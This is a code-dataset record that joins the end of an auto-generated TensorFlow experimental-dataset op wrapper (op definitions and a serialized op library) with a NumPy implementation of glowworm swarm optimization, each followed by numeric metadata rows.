# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "f"
# type: "func"
# }
# attr {
# name: "Tstate"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "preserve_cardinality"
# type: "bool"
# default_value {
# b: false
# }
# }
# }
# op {
# name: "ExperimentalSetStatsAggregatorDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "stats_aggregator"
# type: DT_RESOURCE
# }
# input_arg {
# name: "tag"
# type: DT_STRING
# }
# input_arg {
# name: "counter_prefix"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalSleepDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "sleep_microseconds"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalSlidingWindowDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "window_size"
# type: DT_INT64
# }
# input_arg {
# name: "window_shift"
# type: DT_INT64
# }
# input_arg {
# name: "window_stride"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalSqlDataset"
# input_arg {
# name: "driver_name"
# type: DT_STRING
# }
# input_arg {
# name: "data_source_name"
# type: DT_STRING
# }
# input_arg {
# name: "query"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalStatsAggregatorHandle"
# output_arg {
# name: "handle"
# type: DT_RESOURCE
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalStatsAggregatorSummary"
# input_arg {
# name: "iterator"
# type: DT_RESOURCE
# }
# output_arg {
# name: "summary"
# type: DT_STRING
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalTakeWhileDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "other_arguments"
# type_list_attr: "Targuments"
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "predicate"
# type: "func"
# }
# attr {
# name: "Targuments"
# type: "list(type)"
# has_minimum: true
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalThreadPoolDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "thread_pool"
# type: DT_RESOURCE
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalThreadPoolHandle"
# output_arg {
# name: "handle"
# type: DT_RESOURCE
# }
# attr {
# name: "num_threads"
# type: "int"
# }
# attr {
# name: "max_intra_op_parallelism"
# type: "int"
# default_value {
# i: 1
# }
# }
# attr {
# name: "display_name"
# type: "string"
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "ExperimentalUnbatchDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "ExperimentalUniqueDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "SamplingDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "rate"
# type: DT_FLOAT
# }
# input_arg {
# name: "seed"
# type: DT_INT64
# }
# input_arg {
# name: "seed2"
# type: DT_INT64
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "SnapshotDataset"
# input_arg {
# name: "input_dataset"
# type: DT_VARIANT
# }
# input_arg {
# name: "path"
# type: DT_STRING
# }
# output_arg {
# name: "handle"
# type: DT_VARIANT
# }
# attr {
# name: "output_types"
# type: "list(type)"
# has_minimum: true
# minimum: 1
# }
# attr {
# name: "output_shapes"
# type: "list(shape)"
# has_minimum: true
# minimum: 1
# }
# }
# op {
# name: "StatsAggregatorHandleV2"
# output_arg {
# name: "handle"
# type: DT_RESOURCE
# }
# attr {
# name: "container"
# type: "string"
# default_value {
# s: ""
# }
# }
# attr {
# name: "shared_name"
# type: "string"
# default_value {
# s: ""
# }
# }
# is_stateful: true
# }
# op {
# name: "StatsAggregatorSetSummaryWriter"
# input_arg {
# name: "stats_aggregator"
# type: DT_RESOURCE
# }
# input_arg {
# name: "summary"
# type: DT_RESOURCE
# }
# is_stateful: true
# }
_op_def_lib = _InitOpDefLibrary(b"\n\316\002\n\032ChooseFastestBranchDataset\022\021\n\rinput_dataset\030\025\022\023\n\017ratio_numerator\030\t\022\025\n\021ratio_denominator\030\t\022\035\n\017other_arguments2\nTarguments\032\n\n\006handle\030\025\"\032\n\nTarguments\022\nlist(type)(\001\"\"\n\027num_elements_per_branch\022\003int(\0010\001\"\032\n\010branches\022\nlist(func)(\0010\001\"(\n\027other_arguments_lengths\022\tlist(int)(\0010\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\225\001\n\035ExperimentalAssertNextDataset\022\021\n\rinput_dataset\030\025\022\023\n\017transformations\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\233\001\n\034ExperimentalAutoShardDataset\022\021\n\rinput_dataset\030\025\022\017\n\013num_workers\030\t\022\t\n\005index\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\221\001\n%ExperimentalBytesProducedStatsDataset\022\021\n\rinput_dataset\030\025\022\007\n\003tag\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\234\002\n\026ExperimentalCSVDataset\022\r\n\tfilenames\030\007\022\024\n\020compression_type\030\007\022\017\n\013buffer_size\030\t\022\n\n\006header\030\n\022\017\n\013field_delim\030\007\022\023\n\017use_quote_delim\030\n\022\014\n\010na_value\030\007\022\017\n\013select_cols\030\t\022\037\n\017record_defaults2\014output_types\032\n\n\006handle\030\025\")\n\014output_types\022\nlist(type)(\0010\001:\t\n\0072\005\001\002\003\t\007\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\255\001\n ExperimentalChooseFastestDataset\022\025\n\016input_datasets\030\025*\001N\032\n\n\006handle\030\025\"\014\n\001N\022\003int(\0010\002\"\026\n\017num_experiments\022\003int\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\nD\n\036ExperimentalDatasetCardinality\022\021\n\rinput_dataset\030\025\032\017\n\013cardinality\030\t\nY\n\035ExperimentalDatasetToTFRecord\022\021\n\rinput_dataset\030\025\022\014\n\010filename\030\007\022\024\n\020compression_type\030\007\210\001\001\n\247\001\n%ExperimentalDenseToSparseBatchDataset\022\021\n\rinput_dataset\030\025\022\016\n\nbatch_size\030\t\022\r\n\trow_shape\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\273\001\n%ExperimentalDirectedInterleaveDataset\022\032\n\026selector_input_dataset\030\025\022\032\n\023data_input_datasets\030\025*\001N\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\"\014\n\001N\022\003int(\0010\001\n\373\004\n!ExperimentalGroupByReducerDataset\022\021\n\rinput_dataset\030\025\0225\n\030key_func_other_arguments2\031Tkey_func_other_arguments\0227\n\031init_func_other_arguments2\032Tinit_func_other_arguments\022;\n\033reduce_func_other_arguments2\034Treduce_func_other_arguments\022?\n\035finalize_func_other_arguments2\036Tfinalize_func_other_arguments\032\n\n\006handle\030\025\"\020\n\010key_func\022\004func\"\021\n\tinit_func\022\004func\"\023\n\013reduce_func\022\004func\"\025\n\rfinalize_func\022\004func\")\n\031Tkey_func_other_arguments\022\nlist(type)(\001\"*\n\032Tinit_func_other_arguments\022\nlist(type)(\001\",\n\034Treduce_func_other_arguments\022\nlist(type)(\001\".\n\036Tfinalize_func_other_arguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\213\004\n ExperimentalGroupByWindowDataset\022\021\n\rinput_dataset\030\025\0225\n\030key_func_other_arguments2\031Tkey_func_other_arguments\022;\n\033reduce_func_other_arguments2\034Treduce_func_other_arguments\022E\n window_size_func_other_arguments2!Twindow_size_func_other_arguments\032\n\n\006handle\030\025\"\020\n\010key_func\022\004func\"\023\n\013reduce_func\022\004func\"\030\n\020window_size_func\022\004func\")\n\031Tkey_func_other_arguments\022\nlist(type)(\001\",\n\034Treduce_func_other_arguments\022\nlist(type)(\001\"1\n!Twindow_size_func_other_arguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n=\n\"ExperimentalIdentityIndexedDataset\022\010\n\004size\030\027\032\n\n\006handle\030\025\210\001\001\n\202\001\n\037ExperimentalIgnoreErrorsDataset\022\021\n\rinput_dataset\030\025\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\235\001\n\035ExperimentalIndexedDatasetGet\022\020\n\014materialized\030\024\022\t\n\005index\030\027\032\032\n\ncomponents2\014output_types\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\nI\n%ExperimentalIndexedDatasetMaterialize\022\013\n\007dataset\030\025\022\020\n\014materialized\030\024\210\001\001\n<\n\035ExperimentalIteratorGetDevice\022\014\n\010resource\030\024\032\n\n\006device\030\007\210\001\001\ny\n\027ExperimentalLMDBDataset\022\r\n\tfilenames\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\213\001\n\037ExperimentalLatencyStatsDataset\022\021\n\rinput_dataset\030\025\022\007\n\003tag\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\245\002\n\036ExperimentalMapAndBatchDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\022\016\n\nbatch_size\030\t\022\026\n\022num_parallel_calls\030\t\022\022\n\016drop_remainder\030\n\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\" \n\024preserve_cardinality\022\004bool\032\002(\000\n\207\002\n\026ExperimentalMapDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\"$\n\030use_inter_op_parallelism\022\004bool\032\002(\001\" \n\024preserve_cardinality\022\004bool\032\002(\000\n?\n ExperimentalMatchingFilesDataset\022\014\n\010patterns\030\007\032\n\n\006handle\030\025\210\001\001\n\251\001\n*ExperimentalMaterializedIndexDatasetHandle\032\n\n\006handle\030\024\"\023\n\tcontainer\022\006string\"\025\n\013shared_name\022\006string\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\251\001\n(ExperimentalMaxIntraOpParallelismDataset\022\021\n\rinput_dataset\030\025\022\034\n\030max_intra_op_parallelism\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\205\001\n\"ExperimentalNonSerializableDataset\022\021\n\rinput_dataset\030\025\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\251\002\n\"ExperimentalNumaMapAndBatchDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\022\016\n\nbatch_size\030\t\022\026\n\022num_parallel_calls\030\t\022\022\n\016drop_remainder\030\n\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\" \n\024preserve_cardinality\022\004bool\032\002(\000\n\267\002\n%ExperimentalParallelInterleaveDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\022\020\n\014cycle_length\030\t\022\020\n\014block_length\030\t\022\n\n\006sloppy\030\n\022\032\n\026buffer_output_elements\030\t\022\033\n\027prefetch_input_elements\030\t\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\354\002\n\037ExperimentalParseExampleDataset\022\021\n\rinput_dataset\030\025\022\026\n\022num_parallel_calls\030\t\022\030\n\016dense_defaults2\006Tdense\032\n\n\006handle\030\025\"\035\n\013sparse_keys\022\014list(string)(\001\"\034\n\ndense_keys\022\014list(string)(\001\"%\n\014sparse_types\022\nlist(type)(\001:\007\n\0052\003\001\t\007\"\037\n\006Tdense\022\nlist(type)(\001:\007\n\0052\003\001\t\007\"\035\n\014dense_shapes\022\013list(shape)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\"\022\n\006sloppy\022\004bool\032\002(\000\n\230\001\n$ExperimentalPrivateThreadPoolDataset\022\021\n\rinput_dataset\030\025\022\017\n\013num_threads\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\201\001\n\031ExperimentalRandomDataset\022\010\n\004seed\030\t\022\t\n\005seed2\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\216\001\n\032ExperimentalRebatchDataset\022\021\n\rinput_dataset\030\025\022\017\n\013num_workers\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\225\002\n\027ExperimentalScanDataset\022\021\n\rinput_dataset\030\025\022\027\n\rinitial_state2\006Tstate\022\035\n\017other_arguments2\nTarguments\032\n\n\006handle\030\025\"\t\n\001f\022\004func\"\030\n\006Tstate\022\nlist(type)(\0010\001\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\" \n\024preserve_cardinality\022\004bool\032\002(\000\n\276\001\n%ExperimentalSetStatsAggregatorDataset\022\021\n\rinput_dataset\030\025\022\024\n\020stats_aggregator\030\024\022\007\n\003tag\030\007\022\022\n\016counter_prefix\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\223\001\n\030ExperimentalSleepDataset\022\021\n\rinput_dataset\030\025\022\026\n\022sleep_microseconds\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\271\001\n ExperimentalSlidingWindowDataset\022\021\n\rinput_dataset\030\025\022\017\n\013window_size\030\t\022\020\n\014window_shift\030\t\022\021\n\rwindow_stride\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\233\001\n\026ExperimentalSqlDataset\022\017\n\013driver_name\030\007\022\024\n\020data_source_name\030\007\022\t\n\005query\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\nf\n!ExperimentalStatsAggregatorHandle\032\n\n\006handle\030\024\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\nB\n\"ExperimentalStatsAggregatorSummary\022\014\n\010iterator\030\024\032\013\n\007summary\030\007\210\001\001\n\315\001\n\034ExperimentalTakeWhileDataset\022\021\n\rinput_dataset\030\025\022\035\n\017other_arguments2\nTarguments\032\n\n\006handle\030\025\"\021\n\tpredicate\022\004func\"\032\n\nTarguments\022\nlist(type)(\001\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\224\001\n\035ExperimentalThreadPoolDataset\022\021\n\rinput_dataset\030\025\022\017\n\013thread_pool\030\024\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\210\001\001\n\262\001\n\034ExperimentalThreadPoolHandle\032\n\n\006handle\030\024\"\022\n\013num_threads\022\003int\"#\n\030max_intra_op_parallelism\022\003int\032\002\030\001\"\026\n\014display_name\022\006string\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\n}\n\032ExperimentalUnbatchDataset\022\021\n\rinput_dataset\030\025\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n|\n\031ExperimentalUniqueDataset\022\021\n\rinput_dataset\030\025\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\221\001\n\017SamplingDataset\022\021\n\rinput_dataset\030\025\022\010\n\004rate\030\001\022\010\n\004seed\030\t\022\t\n\005seed2\030\t\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n|\n\017SnapshotDataset\022\021\n\rinput_dataset\030\025\022\010\n\004path\030\007\032\n\n\006handle\030\025\"\036\n\014output_types\022\nlist(type)(\0010\001\" \n\routput_shapes\022\013list(shape)(\0010\001\n\\\n\027StatsAggregatorHandleV2\032\n\n\006handle\030\024\"\027\n\tcontainer\022\006string\032\002\022\000\"\031\n\013shared_name\022\006string\032\002\022\000\210\001\001\nG\n\037StatsAggregatorSetSummaryWriter\022\024\n\020stats_aggregator\030\024\022\013\n\007summary\030\024\210\001\001")
| 46.429315
| 13,471
| 0.691201
| 35,138
| 294,269
| 5.410496
| 0.023877
| 0.06596
| 0.050343
| 0.038351
| 0.846171
| 0.827993
| 0.810777
| 0.796359
| 0.769423
| 0.757335
| 0
| 0.020239
| 0.215728
| 294,269
| 6,337
| 13,472
| 46.436642
| 0.803524
| 0.21165
| 0
| 0.746148
| 1
| 0.003514
| 0.1677
| 0.090446
| 0
| 0
| 0
| 0.002367
| 0.004866
| 1
| 0.038389
| false
| 0.012706
| 0.005137
| 0.012706
| 0.108408
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
183834a31e55e0383d4cd646977e238c96accdca
| 8,457
|
py
|
Python
|
Optimization_Methods/GlowWorm.py
|
Skeftical/SuRF-Reproducibility
|
589096b2caa4f173a00f617dd083a042e7b27f5b
|
[
"MIT"
] | null | null | null |
Optimization_Methods/GlowWorm.py
|
Skeftical/SuRF-Reproducibility
|
589096b2caa4f173a00f617dd083a042e7b27f5b
|
[
"MIT"
] | null | null | null |
Optimization_Methods/GlowWorm.py
|
Skeftical/SuRF-Reproducibility
|
589096b2caa4f173a00f617dd083a042e7b27f5b
|
[
"MIT"
] | null | null | null |
import numpy as np
import time
class GlowWorm():
def _adapt_radius(self,rd, N):
return min(self.rs, max(0, rd + self.beta* (self.nt - len(N)) ) )
def _move(self,xi, xj):
xj = xj.reshape(1,-1)
xi = xi.reshape(1,-1)
return xi + self.s*((xj-xi)/np.linalg.norm(xj-xi) )
def _probability_of_moving(self,lj, li, sN):
loss = lj-li
return loss/sN
def _return_neighbourhood(self,x, rd, l, i):
ix = (np.linalg.norm(self.X-x,axis=1)<rd) & (l<self.L)
ix[i] = False
return np.nonzero(ix)[0]#returns tuple of arrays
def _luciferin_update(self,l, x):
return (1-self.rho)*l+self.gamma*self.opt_func(x.reshape(1,-1))
def optimize(self):
for k in range(self.iter_max):
#Luciferin update phase
if self.time_capture:
start = time.time()
for i in range(self.L.shape[0]):
self.L[i]= self._luciferin_update(self.L[i],self.X[i])
if self.time_capture:
end = time.time() - start
self.SUM_TIME += end
#Prune away invalid glowworms
if self.prune and k==0:
valid = self.L!=-np.inf
self.X = self.X[valid]
self.R = self.R[valid]
self.L = self.L[valid]
#Movement phase
for i in range(self.X.shape[0]):
N = self._return_neighbourhood(self.X[i], self.R[i], self.L[i], i)
max_ = None
max_j = None
if len(N) == 0:
#First adapt its radius so that it won't die out.
self.R[i] = self._adapt_radius(self.R[i], N)
# print('Worm {0} has no neighbours'.format(i))
continue;
for j in N:
sN = np.sum(self.L[N]-self.L[i])
pij = self._probability_of_moving(self.L[j], self.L[i], sN)
if max_ is None or pij>max_:
max_j = j
max_ = pij
self.X[i] = self._move(self.X[i], self.X[max_j])
self.R[i] = self._adapt_radius(self.R[i], N)
if self.trace:
self.history = np.column_stack((self.history, self.X))
return self.X
def __init__(self,opt_func, dimensions=1, glowworms=50, s=0.03, r0=2, iter_max=100,
rho=0.4,gamma=0.6,beta=0.08,nt=5, search_space=(0,1), log_trace=False, prune=False, time_capture=False):
'''
GlowWorm for multi-modal optimization
args :
----------------------
opt_func : callable
optimization function, has to accept an input parameter
dimensions : [int]
Number of dimensions
glowworms : [int]
Number of particles
s : float
Step size
r0 : float
Initial neighbourhood size
iter_max : int
Maximum number of iterations
rho : float
Luciferin decay constant
gamma : float
Luciferin enhancement constant
beta : float
Neighbourhood discount
search_space : tuple \in R^d
Search space across all dimensions
log_trace : boolean
Logs the path of glowworms for debugging. The paths are then available through self.history.
Feature is disabled for over 2-d
'''
DIMENSIONS = dimensions
GLOWWORMS = glowworms
self.opt_func = opt_func
self.s = s
self.r0 = r0
self.X = np.zeros((GLOWWORMS,DIMENSIONS))
random_positions = np.random.uniform(low=search_space[0], high=search_space[1], size=(GLOWWORMS,DIMENSIONS))
self.X+=random_positions
self.L = np.zeros(GLOWWORMS)+5
self.R = np.ones(GLOWWORMS)*r0
self.iter_max = iter_max
#Constants
self.rho = rho #lucifering decay
self.gamma = gamma #lucifering enhancement
self.beta = beta
self.nt = nt
self.rs = r0
self.trace = False
self.prune = prune
self.time_capture = time_capture
self.SUM_TIME = 0
if log_trace==True:
self.trace = True
self.history = self.X
class GlowWormDensity():
def _adapt_radius(self,rd, N):
return min(self.rs, max(0, rd + self.beta* (self.nt - len(N)) ) )
def _move(self,xi, xj):
xj = xj.reshape(1,-1)
xi = xi.reshape(1,-1)
return xi + self.s*((xj-xi)/np.linalg.norm(xj-xi) )
def _probability_of_moving(self,lj, li, sN):
loss = lj-li
return loss/sN
def _return_neighbourhood(self,x, rd, l, i):
ix = (np.linalg.norm(self.X-x,axis=1)<rd) & (l<self.L)
ix[i] = False
return np.nonzero(ix)[0]#returns tuple of arrays
def _luciferin_update(self,l, x):
return (1-self.rho)*l+self.gamma*self.opt_func(x.reshape(1,-1))
def optimize(self):
for k in range(self.iter_max):
#Luciferin update phase
for i in range(self.L.shape[0]):
self.L[i]= self._luciferin_update(self.L[i],self.X[i])
#Movement phase
for i in range(self.X.shape[0]):
N = self._return_neighbourhood(self.X[i], self.R[i], self.L[i], i)
max_ = None
max_j = None
if len(N) == 0:
#First adapt its radius so that it won't die out.
self.R[i] = self._adapt_radius(self.R[i], N)
# print('Worm {0} has no neighbours'.format(i))
continue;
for j in N:
sN = np.sum(self.L[N]-self.L[i])
if self.probx is not None:
pij = self._probability_of_moving(self.L[j], self.L[i], sN)*float(self.probx(self.X[j]))
else:
pij = self._probability_of_moving(self.L[j], self.L[i], sN)
if max_ is None or pij>max_:
max_j = j
max_ = pij
self.X[i] = self._move(self.X[i], self.X[max_j])
if self.trace:
self.history = np.column_stack((self.history, self.X))
self.R[i] = self._adapt_radius(self.R[i], N)
return self.X
def __init__(self,opt_func, dimensions=1, glowworms=50, s=0.03, r0=2,iter_max=100,
rho=0.4,gamma=0.6,beta=0.08,nt=5, search_space=(0,1), log_trace=False, probx=None):
'''
GlowWorm for multi-modal optimization
args :
----------------------
opt_func : callable
optimization function, has to accept an input parameter
dimensions : [int]
Number of dimensions
glowworms : [int]
Number of particles
s : float
Step size
r0 : float
Initial neighbourhood size
iter_max : int
Maximum number of iterations
rho : float
Luciferin decay constant
gamma : float
Luciferin enhancement constant
beta : float
Neighbourhood discount
search_space : tuple \in R^d
Search space across all dimensions
log_trace : boolean
Logs the path of glowworms for debugging. The paths are then available through self.history.
Feature is disabled for over 2-d
'''
DIMENSIONS = dimensions
GLOWWORMS = glowworms
self.opt_func = opt_func
self.s = 0.03
self.r0 = r0
self.X = np.zeros((GLOWWORMS,DIMENSIONS))
random_positions = np.random.uniform(low=search_space[0], high=search_space[1], size=(GLOWWORMS,DIMENSIONS))
self.X+=random_positions
self.L = np.zeros(GLOWWORMS)+5
self.R = np.ones(GLOWWORMS)*r0
self.iter_max = iter_max
#Constants
self.rho = 0.4 #lucifering decay
self.gamma = 0.6 #lucifering enhancement
self.beta = 0.08
self.nt = 5
self.rs = self.r0
self.trace = False
if dimensions==2 and log_trace==True:
self.trace = True
self.history = self.X
self.probx = probx
| 37.420354
| 121
| 0.521816
| 1,118
| 8,457
| 3.84347
| 0.150268
| 0.033744
| 0.01536
| 0.013963
| 0.863393
| 0.862462
| 0.862462
| 0.862462
| 0.862462
| 0.862462
| 0
| 0.019051
| 0.366915
| 8,457
| 226
| 122
| 37.420354
| 0.783526
| 0.222065
| 0
| 0.748201
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.100719
| false
| 0
| 0.014388
| 0.028777
| 0.215827
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
187b4be1e6f2d3982a2964b04d58f6067948143e
| 290
|
py
|
Python
|
siamese-net/config.py
|
Nikdevelop/siamese_net
|
1a40bc56184c76a85f2d10054a358a3c9821a87f
|
[
"MIT"
] | 27
|
2020-10-20T10:06:04.000Z
|
2022-03-04T16:42:56.000Z
|
siamese-net/config.py
|
Nikdevelop/siamese_net
|
1a40bc56184c76a85f2d10054a358a3c9821a87f
|
[
"MIT"
] | 4
|
2021-06-27T09:23:26.000Z
|
2022-02-01T14:58:49.000Z
|
siamese-net/config.py
|
Nikdevelop/siamese_net
|
1a40bc56184c76a85f2d10054a358a3c9821a87f
|
[
"MIT"
] | 12
|
2020-10-02T18:05:51.000Z
|
